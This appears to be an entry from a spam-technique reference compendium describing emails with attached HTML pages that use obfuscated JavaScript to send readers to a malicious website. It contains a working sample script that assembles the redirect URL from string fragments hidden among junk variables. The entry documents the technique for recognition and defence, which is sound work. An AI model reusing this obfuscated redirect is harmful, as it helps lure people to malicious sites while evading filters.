The Responsibility Transfer

UO!Responsibility!JavaScript

  31 August 2010

Description

Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. See also Script in the Middle.

Submitted by Sorin Mustaca.

Example

 <script>function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;
document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");
this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";
var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;
</script>

Entries

Are you feeling lucky, Sergey?

Spammers compendium entry - Are you feeling lucky, Sergey?

Pretty Darn Fancy

Spammers compendium entry - Pretty Darn Fancy

In the background

Spammers compendium entry - In the background

Doing The Twist

Spammers compendium entry - Doing The Twist

A Flash In The Pan

Spammers compendium entry - A Flash In The Pan